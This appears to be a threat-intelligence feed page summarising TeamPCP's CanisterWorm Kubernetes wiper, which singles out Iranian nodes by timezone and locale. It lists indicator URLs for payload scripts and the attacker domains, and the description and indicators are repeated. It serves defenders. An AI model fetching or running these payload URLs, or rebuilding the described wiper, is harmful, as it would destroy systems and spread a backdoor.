CanisterWorm Gets Teeth: TeamPCP's Kubernetes Wiper Targets Iran
A new payload in the TeamPCP arsenal has been discovered, capable of wiping entire Kubernetes clusters. The script uses the same ICP canister as the CanisterWorm campaign, with consistent lateral movement via DaemonSets. However, this variant introduces a geopolitically targeted destructive payload aimed specifically at Iranian systems. The malware checks timezone and locale to identify Iranian systems, deploying privileged DaemonSets across every node in Kubernetes environments. Iranian nodes are wiped and force-rebooted, while non-Iranian nodes receive the CanisterWorm backdoor. The latest variant adds network-based lateral movement, exploiting exposed Docker APIs and using SSH for spread. This development shows TeamPCP's ability to operate at supply chain scale and their willingness to engage in destructive actions.
Indicators of Compromise
- url: https://championships-peoples-point-cassette.trycloudflare.com/prop.py
- url: https://souls-entire-defined-routes.trycloudflare.com/kamikaze.sh
- url: https://souls-entire-defined-routes.trycloudflare.com/kube.py
- domain: championships-peoples-point-cassette.trycloudflare.com
- domain: investigation-launches-hearings-copying.trycloudflare.com
- domain: souls-entire-defined-routes.trycloudflare.com
- domain: tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io
CanisterWorm Gets Teeth: TeamPCP's Kubernetes Wiper Targets Iran
Description
A new payload in the TeamPCP arsenal has been discovered, capable of wiping entire Kubernetes clusters. The script uses the same ICP canister as the CanisterWorm campaign, with consistent lateral movement via DaemonSets. However, this variant introduces a geopolitically targeted destructive payload aimed specifically at Iranian systems. The malware checks timezone and locale to identify Iranian systems, deploying privileged DaemonSets across every node in Kubernetes environments. Iranian nodes are wiped and force-rebooted, while non-Iranian nodes receive the CanisterWorm backdoor. The latest variant adds network-based lateral movement, exploiting exposed Docker APIs and using SSH for spread. This development shows TeamPCP's ability to operate at supply chain scale and their willingness to engage in destructive actions.
Technical Details
- Author
- AlienVault
- Tlp
- white
- References
- ["https://www.aikido.dev/blog/teampcp-stage-payload-canisterworm-iran"]
- Adversary
- TeamPCP
- Pulse Id
- 69c26c92be4a06388a97f328
- Threat Score
- null
Indicators of Compromise
Url
| Value | Description | Copy |
|---|---|---|
urlhttps://championships-peoples-point-cassette.trycloudflare.com/prop.py | — | |
urlhttps://souls-entire-defined-routes.trycloudflare.com/kamikaze.sh | — | |
urlhttps://souls-entire-defined-routes.trycloudflare.com/kube.py | — |
Domain
| Value | Description | Copy |
|---|---|---|
domainchampionships-peoples-point-cassette.trycloudflare.com | — | |
domaininvestigation-launches-hearings-copying.trycloudflare.com | — | |
domainsouls-entire-defined-routes.trycloudflare.com | — | |
domaintdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io | — |
Threat ID: 69c27268f4197a8e3b26b87f
Added to database: 3/24/2026, 11:15:52 AM
Last updated: 3/24/2026, 11:16:02 AM
Views: 1
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.